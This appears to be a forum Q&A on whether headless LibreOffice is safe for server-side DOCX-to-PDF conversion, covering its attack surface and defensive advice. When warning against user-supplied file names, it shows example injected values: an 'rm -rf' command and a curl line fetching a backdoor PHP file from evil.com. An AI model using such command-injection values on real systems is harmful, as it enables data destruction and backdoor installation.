Is LibreOffice (headless) safe to use on a web server?
I have my-template.docx that I convert into my-report.docx with OpenXml and then my-report.pdf with:
soffice --headless --convert-to pdf my-report.docx
TL;DR in your case, it is.
What you're almost certainly doing is replacing some information inside the DOCX and using LibreOffice to have a "nice" conversion to PDF. While there are other tools that might do something like that (wkhtmltopdf for example), you're not using LibreOffice in any vulnerable way that I'm aware of (and I use LibreOffice like you do too):
- the source document is under your control (no user-entered macros, remote file inclusions, remote data sources or other shenanigans)
- the values you inject into the DOCX are also under your control - or are they? - and do not contain user input such as HREF targets that might make it into the PDF.
- LibreOffice in headless mode does not expose any open ports or interfaces that might be exploited by a third process.
Possible but unlikely "exploit" avenues that might remain:
- the destination file. I expect that even if you asked the user for the name of the resulting file, still you would do something like create a unique pdf filename, and send the user name as
Content-Disposition: attachment; filename="thatswhatshesaid";
, not using the user's filename on your filesystem and risking saving data tobyebye.pdf && rm -rf ...
(orirrelevant.pdf\x00; curl -o index2.php http://evil.com/backdoor.php
or...), sending back aLocation: downloads/whatshesaid.pdf
. - very large values in the XML output that might trigger anomalous behaviour. Chances of this happening, and of doing so in any meaningful (for the attacker) way, are negligible, but still, nothing's wrong with checking.
As long as you control the content of the input file there should be no issue at all. Keep in mind that LibreOffice only allows one active instance per user profile, so if you want to be able to process more than one document in parallel you should use separate user profiles.
If you have untrusted input data the whole question becomes more complex to answer. While there has been quite a bit of work securing the code base, a desktop office suite is still a huge piece of software with a lot of potential attack surfaces (macros, remote data connections, old binary file formats, ...). While all of these features should be blocked in headless operations you have to trust that there are no undiscovered bugs.
The remaining points in the Microsoft article should not apply to LibreOffice. The headless mode is designed not to interact with the desktop environment and except for the user profile does not change anything in the system or depends on any desktop related piece. The default builds will still depend on some GUI libraries but if that actually becomes a problem there is an experimental build option to build a non-GUI version without any X/GTK/KDE library dependencies.
As an alternative there are also a few projects built on top of LibreOffice that try to make converting documents even easier and might actually be faster by pre-forking or using the LibreOfficeKit API. Two examples are JODConverter or unoconv.